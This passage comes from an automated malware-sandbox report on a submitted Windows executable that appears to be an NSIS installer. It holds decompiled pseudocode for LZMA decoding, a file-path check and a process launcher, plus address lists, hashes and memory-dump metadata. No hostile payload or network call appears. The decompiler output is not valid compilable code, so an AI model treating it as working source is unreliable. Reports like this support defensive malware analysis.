						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                0x00405ee4
                0x00405eeb
                0x00405ef1
                0x00405ef7
                0x00000000
                0x00405efb
                0x00405f07
                0x00405f07
                0x00405f07
                0x00405f10
                0x00000000
                0x00000000
                0x00405f16
                0x00000000
                0x00405f1d
                0x00405f21
                0x00000000
                0x00000000
                0x00405f2a
                0x00405f2d
                0x00405f30
                0x00405f32
                0x00405f34
                0x00000000
                0x00000000
                0x00405f3a
                0x00405f3d
                0x00405f3f
                0x00405f40
                0x00405f43
                0x00405f45
                0x00405f46
                0x00405f48
                0x00405f4b
                0x00405f50
                0x00405f55
                0x00405f5e
                0x00405f71
                0x00405f74
                0x00405f7d
                0x00405f80
                0x00405fa8
                0x00405fa8
                0x00405faa
                0x00405fb8
                0x00405fb8
                0x00405fbc
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00405fac
                0x00405fac
                0x00405faf
                0x00405faf
                0x00405fb0
                0x00405fb0
                0x00000000
                0x00405fac
                0x00405f82
                0x00405f86
                0x00405f8b
                0x00405f8b
                0x00405f94
                0x00405f9a
                0x00405f9c
                0x00405f9f
                0x00000000
                0x00405fa5
                0x00405fa5
                0x00000000
                0x00405fa5
                0x00000000
                0x00405fc2
                0x00405fc2
                0x00405fc6
                0x00406872
                0x00000000
                0x00406872
                0x00405fcf
                0x00405fdf
                0x00405fe2
                0x00405fe5
                0x00405fe5
                0x00405fe5
                0x00405fe8
                0x00405fe8
                0x00405fec
                0x00000000
                0x00000000
                0x00405fee
                0x00405ff1
                0x00405ff4
                0x0040601e
                0x00406024
                0x0040602b
                0x00000000
                0x0040602b
                0x00405ff6
                0x00405ffa
                0x00405ffd
                0x00406002
                0x00406002
                0x0040600d
                0x00406013
                0x00406015
                0x00406018
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040605d
                0x00406063
                0x00406066
                0x00406073
                0x0040607b
                0x00000000
                0x00000000
                0x00406032
                0x00406032
                0x00406036
                0x00406881
                0x00000000
                0x00406881
                0x00406042
                0x0040604d
                0x0040604d
                0x0040604d
                0x00406050
                0x00406053
                0x00406056
                0x00406059
                0x0040605b
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004066f2
                0x004066f2
                0x004066f8
                0x004066fe
                0x00406701
                0x00406704
                0x0040671e
                0x00406721
                0x00406727
                0x00406732
                0x00406732
                0x00406734
                0x00406706
                0x00406706
                0x00406715
                0x00406719
                0x00406719
                0x00406737
                0x0040673e
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406740
                0x00406740
                0x00406744
                0x004068f3
                0x00000000
                0x004068f3
                0x00406750
                0x00406757
                0x0040675f
                0x0040675f
                0x0040675f
                0x00406762
                0x00406765
                0x00406765
                0x00000000
                0x00000000
                0x00406083
                0x00406085
                0x00406088
                0x004060f9
                0x004060fc
                0x004060ff
                0x00406106
                0x00406110
                0x00000000
                0x00406110
                0x0040608a
                0x0040608e
                0x00406091
                0x00406093
                0x00406096
                0x00406099
                0x0040609b
                0x0040609e
                0x004060a0
                0x004060a5
                0x004060a8
                0x004060ab
                0x004060af
                0x004060b6
                0x004060b9
                0x004060c0
                0x004060c4
                0x004060cc
                0x004060cc
                0x004060cc
                0x004060c6
                0x004060c6
                0x004060c6
                0x004060bb
                0x004060bb
                0x004060bb
                0x004060d0
                0x004060d3
                0x004060f1
                0x004060f3
                0x00000000
                0x004060f3
                0x004060d5
                0x004060d8
                0x004060db
                0x004060de
                0x004060e0
                0x004060e0
                0x004060e0
                0x004060e3
                0x004060e6
                0x004060e8
                0x004060e9
                0x004060ec
                0x00000000
                0x00000000
                0x00406322
                0x00406326
                0x00406344
                0x00406347
                0x0040634e
                0x00406351
                0x00406354
                0x00406357
                0x0040635a
                0x0040635d
                0x0040635f
                0x00406366
                0x00406367
                0x00406369
                0x0040636c
                0x0040636f
                0x00406372
                0x00406372
                0x00406377
                0x00000000
                0x00406377
                0x00406328
                0x0040632b
                0x0040632e
                0x00406338
                0x00000000
                0x00000000
                0x0040638c
                0x00406390
                0x004063b3
                0x004063b6
                0x004063b9
                0x004063c3
                0x00406392
                0x00406392
                0x00406395
                0x00406398
                0x0040639b
                0x004063a8
                0x004063ab
                0x004063ab
                0x00000000
                0x00000000
                0x004063cf
                0x004063d3
                0x00000000
                0x00000000
                0x004063d9
                0x004063dd
                0x00000000
                0x00000000
                0x004063e3
                0x004063e5
                0x004063e9
                0x004063e9
                0x004063ec
                0x004063f0
                0x00000000
                0x00000000
                0x00406440
                0x00406444
                0x0040644b
                0x0040644e
                0x00406451
                0x0040645b
                0x00000000
                0x0040645b
                0x00406446
                0x00000000
                0x00000000
                0x00406467
                0x0040646b
                0x00406472
                0x00406475
                0x00406478
                0x0040646d
                0x0040646d
                0x0040646d
                0x0040647b
                0x0040647e
                0x00406481
                0x00406481
                0x00406484
                0x00406487
                0x0040648a
                0x0040648a
                0x0040648d
                0x00406494
                0x00406499
                0x00000000
                0x00000000
                0x00406527
                0x00406527
                0x0040652b
                0x004068c9
                0x00000000
                0x004068c9
                0x00406531
                0x00406534
                0x00406537
                0x0040653b
                0x0040653e
                0x00406544
                0x00406546
                0x00406546
                0x00406546
                0x00406549
                0x0040654c
                0x00000000
                0x00000000
                0x0040611c
                0x0040611c
                0x00406120
                0x0040688d
                0x00000000
                0x0040688d
                0x00406126
                0x00406129
                0x0040612c
                0x00406130
                0x00406133
                0x00406139
                0x0040613b
                0x0040613b
                0x0040613b
                0x0040613e
                0x00406141
                0x00406141
                0x00406144
                0x00406147
                0x00000000
                0x00000000
                0x0040614d
                0x00406153
                0x00000000
                0x00000000
                0x00406159
                0x00406159
                0x0040615d
                0x00406160
                0x00406163
                0x00406166
                0x00406169
                0x0040616a
                0x0040616d
                0x0040616f
                0x00406175
                0x00406178
                0x0040617b
                0x0040617e
                0x00406181
                0x00406184
                0x00406187
                0x004061a3
                0x004061a6
                0x004061a9
                0x004061ac
                0x004061b3
                0x004061b7
                0x004061b9
                0x004061bd
                0x00406189
                0x00406189
                0x0040618d
                0x00406195
                0x0040619a
                0x0040619c
                0x0040619e
                0x0040619e
                0x004061c0
                0x004061c7
                0x004061ca
                0x00000000
                0x004061d0
                0x00000000
                0x004061d0
                0x00000000
                0x004061d5
                0x004061d5
                0x004061d9
                0x00406899
                0x00000000
                0x00406899
                0x004061df
                0x004061e2
                0x004061e5
                0x004061e9
                0x004061ec
                0x004061f2
                0x004061f4
                0x004061f4
                0x004061f4
                0x004061f7
                0x004061fa
                0x004061fa
                0x004061fa
                0x00406200
                0x00000000
                0x00000000
                0x00406202
                0x00406205
                0x00406208
                0x0040620b
                0x0040620e
                0x00406211
                0x00406214
                0x00406217
                0x0040621a
                0x0040621d
                0x00406220
                0x00406238
                0x0040623b
                0x0040623e
                0x00406241
                0x00406241
                0x00406244
                0x00406248
                0x0040624a
                0x00406222
                0x00406222
                0x0040622a
                0x0040622f
                0x00406231
                0x00406233
                0x00406233
                0x0040624d
                0x00406254
                0x00406257
                0x00000000
                0x00406259
                0x00000000
                0x00406259
                0x00406257
                0x0040625e
                0x0040625e
                0x0040625e
                0x0040625e
                0x00000000
                0x00000000
                0x00406299
                0x00406299
                0x0040629d
                0x004068a5
                0x00000000
                0x004068a5
                0x004062a3
                0x004062a6
                0x004062a9
                0x004062ad
                0x004062b0
                0x004062b6
                0x004062b8
                0x004062b8
                0x004062b8
                0x004062bb
                0x004062be
                0x004062be
                0x004062c4
                0x00406262
                0x00406262
                0x00406265
                0x00000000
                0x00406265
                0x004062c6
                0x004062c6
                0x004062c9
                0x004062cc
                0x004062cf
                0x004062d2
                0x004062d5
                0x004062d8
                0x004062db
                0x004062de
                0x004062e1
                0x004062e4
                0x004062fc
                0x004062ff
                0x00406302
                0x00406305
                0x00406305
                0x00406308
                0x0040630c
                0x0040630e
                0x004062e6
                0x004062e6
                0x004062ee
                0x004062f3
                0x004062f5
                0x004062f7
                0x004062f7
                0x00406311
                0x00406318
                0x0040631b
                0x00000000
                0x0040631d
                0x00000000
                0x0040631d
                0x00000000
                0x004065aa
                0x004065aa
                0x004065ae
                0x004068d5
                0x00000000
                0x004068d5
                0x004065b4
                0x004065b7
                0x004065ba
                0x004065be
                0x004065c1
                0x004065c7
                0x004065c9
                0x004065c9
                0x004065c9
                0x004065cc
                0x00000000
                0x00000000
                0x0040637a
                0x0040637a
                0x0040637d
                0x00000000
                0x00000000
                0x004066b9
                0x004066bd
                0x004066df
                0x004066e2
                0x004066ec
                0x004066ef
                0x004066ef
                0x00000000
                0x004066ef
                0x004066bf
                0x004066c2
                0x004066c6
                0x004066c9
                0x004066c9
                0x004066cc
                0x00000000
                0x00000000
                0x00406776
                0x0040677a
                0x00406798
                0x00406798
                0x00406798
                0x0040679f
                0x004067a6
                0x004067ad
                0x004067ad
                0x00000000
                0x004067ad
                0x0040677c
                0x0040677f
                0x00406782
                0x00406785
                0x0040678c
                0x004066d0
                0x004066d0
                0x004066d3
                0x00000000
                0x00000000
                0x00406867
                0x0040686a
                0x00000000
                0x00000000
                0x004064a1
                0x004064a3
                0x004064aa
                0x004064ab
                0x004064ad
                0x004064b0
                0x00000000
                0x00000000
                0x004064b8
                0x004064bb
                0x004064be
                0x004064c0
                0x004064c2
                0x004064c2
                0x004064c3
                0x004064c6
                0x004064cd
                0x004064d0
                0x004064de
                0x00000000
                0x00000000
                0x004067b4
                0x004067b4
                0x004067b7
                0x004067be
                0x00000000
                0x00000000
                0x004067c3
                0x004067c3
                0x004067c7
                0x004068ff
                0x00000000
                0x004068ff
                0x004067cd
                0x004067d0
                0x004067d3
                0x004067d7
                0x004067da
                0x004067e0
                0x004067e2
                0x004067e2
                0x004067e2
                0x004067e5
                0x004067e8
                0x004067e8
                0x004067e8
                0x004067e8
                0x004067eb
                0x004067eb
                0x004067ef
                0x0040684f
                0x00406852
                0x00406857
                0x00406858
                0x0040685a
                0x0040685c
                0x0040685f
                0x0040676b
                0x0040676b
                0x00000000
                0x0040676b
                0x004067f1
                0x004067f7
                0x004067fa
                0x004067fd
                0x00406800
                0x00406803
                0x00406806
                0x00406809
                0x0040680c
                0x0040680f
                0x00406812
                0x0040682b
                0x0040682e
                0x00406831
                0x00406834
                0x00406838
                0x0040683a
                0x0040683a
                0x0040683b
                0x0040683e
                0x00406814
                0x00406814
                0x0040681c
                0x00406821
                0x00406823
                0x00406826
                0x00406826
                0x00406841
                0x00406848
                0x00000000
                0x0040684a
                0x00000000
                0x0040684a
                0x00000000
                0x004064e6
                0x004064e9
                0x0040651f
                0x0040664f
                0x0040664f
                0x0040664f
                0x0040664f
                0x00406652
                0x00406652
                0x00406655
                0x00406657
                0x004068e1
                0x00000000
                0x004068e1
                0x0040665d
                0x00406660
                0x00000000
                0x00000000
                0x00406666
                0x0040666a
                0x0040666d
                0x0040666d
                0x0040666d
                0x00000000
                0x0040666d
                0x004064eb
                0x004064ed
                0x004064ef
                0x004064f1
                0x004064f4
                0x004064f5
                0x004064f7
                0x004064f9
                0x004064fc
                0x004064ff
                0x00406515
                0x0040651a
                0x00406552
                0x00406552
                0x00406556
                0x00406582
                0x00406584
                0x0040658b
                0x0040658e
                0x00406591
                0x00406591
                0x00406596
                0x00406596
                0x00406598
                0x0040659b
                0x004065a2
                0x004065a5
                0x004065d2
                0x004065d2
                0x004065d5
                0x004065d8
                0x0040664c
                0x0040664c
                0x0040664c
                0x00000000
                0x0040664c
                0x004065da
                0x004065e0
                0x004065e3
                0x004065e6
                0x004065e9
                0x004065ec
                0x004065ef
                0x004065f2
                0x004065f5
                0x004065f8
                0x004065fb
                0x00406614
                0x00406616
                0x00406619
                0x0040661a
                0x0040661d
                0x0040661f
                0x00406622
                0x00406624
                0x00406626
                0x00406629
                0x0040662b
                0x0040662e
                0x00406632
                0x00406634
                0x00406634
                0x00406635
                0x00406638
                0x0040663b
                0x004065fd
                0x004065fd
                0x00406605
                0x0040660a
                0x0040660c
                0x0040660f
                0x0040660f
                0x0040663e
                0x00406645
                0x004065cf
                0x004065cf
                0x004065cf
                0x004065cf
                0x00000000
                0x00406647
                0x00000000
                0x00406647
                0x00406645
                0x00406558
                0x0040655b
                0x0040655d
                0x00406560
                0x00406563
                0x00406566
                0x00406568
                0x0040656b
                0x0040656e
                0x0040656e
                0x00406571
                0x00406571
                0x00406574
                0x0040657b
                0x0040654f
                0x0040654f
                0x0040654f
                0x0040654f
                0x00000000
                0x0040657d
                0x00000000
                0x0040657d
                0x0040657b
                0x00406501
                0x00406504
                0x00406506
                0x00406509
                0x00000000
                0x00000000
                0x00406268
                0x00406268
                0x0040626c
                0x004068b1
                0x00000000
                0x004068b1
                0x00406272
                0x00406275
                0x00406278
                0x0040627b
                0x0040627e
                0x00406281
                0x00406284
                0x00406286
                0x00406289
                0x0040628c
                0x0040628f
                0x00406291
                0x00406291
                0x00406291
                0x00000000
                0x00000000
                0x004063f3
                0x004063f3
                0x004063f7
                0x004068bd
                0x00000000
                0x004068bd
                0x004063fd
                0x00406400
                0x00406403
                0x00406406
                0x00406408
                0x00406408
                0x00406408
                0x0040640b
                0x0040640e
                0x00406411
                0x00406414
                0x00406417
                0x0040641a
                0x0040641b
                0x0040641d
                0x0040641d
                0x0040641d
                0x00406420
                0x00406423
                0x00406426
                0x00406429
                0x00406429
                0x00406429
                0x0040642c
                0x0040642e
                0x0040642e
                0x00000000
                0x00000000
                0x00406670
                0x00406670
                0x00406670
                0x00406674
                0x00000000
                0x00000000
                0x0040667a
                0x0040667d
                0x00406680
                0x00406683
                0x00406685
                0x00406685
                0x00406685
                0x00406688
                0x0040668b
                0x0040668e
                0x00406691
                0x00406694
                0x00406697
                0x00406698
                0x0040669a
                0x0040669a
                0x0040669a
                0x0040669d
                0x004066a0
                0x004066a3
                0x004066a6
                0x004066a9
                0x004066ad
                0x004066af
                0x004066b2
                0x00000000
                0x004066b4
                0x00406431
                0x00406431
                0x00000000
                0x00406431
                0x004066b2
                0x004068e7
                0x00406909
                0x0040690f
                0x00406911
                0x00406918
                0x00000000
                0x00000000
                0x00405f16
                0x0040691e
                0x0040691e
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID:
                • String ID: tCPInfo
                • API String ID: 0-2120998202
                • Opcode ID: b0886b8647590f49d196a4ae9d285ef76414e2f02c97ef520e18707fbbef2023
                • Instruction ID: 41b63ac7315969e8c4cdeb39c952146f886d2b6e08649ca9387d619dcd40c967
                • Opcode Fuzzy Hash: b0886b8647590f49d196a4ae9d285ef76414e2f02c97ef520e18707fbbef2023
                • Instruction Fuzzy Hash: A8817871D04229CFDF24CFA8C8447AEBBB0FB44305F25816AD856BB281D7785A96DF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004056C8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 627 4056c8-4056e3 call 405af4 call 40567b 632 4056e5-4056e7 627->632 633 4056e9-4056f6 call 405d03 627->633 634 40573b-40573d 632->634 637 405702-405704 633->637 638 4056f8-4056fc 633->638 640 40571a-405723 lstrlenA 637->640 638->632 639 4056fe-405700 638->639 639->632 639->637 641 405725-405739 call 4055e7 GetFileAttributesA 640->641 642 405706-40570d call 405d9c 640->642 641->634 647 405714-405715 call 40562e 642->647 648 40570f-405712 642->648 647->640 648->632 648->647
                C-Code - Quality: 53%
                			E004056C8(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00405AF4(0x421938, _a4);
				_t21 = E0040567B(0x421938);
				if(_t21 != 0) {
					E00405D03(_t21);
					if(( *0x423f30 & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x421938;
						while(1) {
							_t11 = lstrlenA(0x421938);
							_push(0x421938);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E00405D9C();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E0040562E(0x421938);
								continue;
							} else {
								goto L1;
							}
						}
						E004055E7();
						_t16 = GetFileAttributesA(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                0x004056d4
                0x004056df
                0x004056e3
                0x004056ea
                0x004056f6
                0x00405702
                0x00405702
                0x0040571a
                0x0040571b
                0x00405722
                0x00405723
                0x00000000
                0x00000000
                0x00405706
                0x0040570d
                0x00405715
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040570d
                0x00405725
                0x0040572b
                0x00000000
                0x00405739
                0x004056f8
                0x004056fc
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004056fc
                0x004056e5
                0x00000000

                APIs
                  • Part of subcall function 00405AF4: lstrcpynA.KERNEL32(?,?,00000400,00403351,xwkwrbeiqiuu Setup,NSIS Error), ref: 00405B01
                  • Part of subcall function 0040567B: CharNextA.USER32(:T@,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,C:\,?,004056DF,C:\,C:\,?,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,76DDF560,0040543A,?,76DDF560,00000000), ref: 00405689
                  • Part of subcall function 0040567B: CharNextA.USER32(00000000), ref: 0040568E
                  • Part of subcall function 0040567B: CharNextA.USER32(00000000), ref: 0040569D
                • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,76DDF560,0040543A,?,76DDF560,00000000), ref: 0040571B
                • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,76DDF560,0040543A,?,76DDF560,00000000), ref: 0040572B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                • String ID: "C:\Users\user\Desktop\O1ySvN9SvL.exe" $C:\
                • API String ID: 3248276644-2535334965
                • Opcode ID: d7a6fd6b08d9551768931ca80393006ad21f6be298864b6a11b3b7159a130088
                • Instruction ID: c9a5ad2ab4ff501f0e3d3fb61e1c810f238de096eca0db9d00b0265de3cbf42b
                • Opcode Fuzzy Hash: d7a6fd6b08d9551768931ca80393006ad21f6be298864b6a11b3b7159a130088
                • Instruction Fuzzy Hash: 81F04C25116D5152C72233392C09AAF1755CE9632CB48093BF865B22E2DB3D8803ED7E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405361 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24processCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 650 405361-40538e CreateProcessA 651 405390-405399 CloseHandle 650->651 652 40539c-40539d 650->652 651->652
                C-Code - Quality: 100%
                			E00405361(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x422538->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x422538,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                0x0040536a
                0x00405386
                0x0040538e
                0x00405393
                0x00000000
                0x00405399
                0x0040539d

                APIs
                • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422538,Error launching installer), ref: 00405386
                • CloseHandle.KERNEL32(?), ref: 00405393
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405361
                • Error launching installer, xrefs: 00405374
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
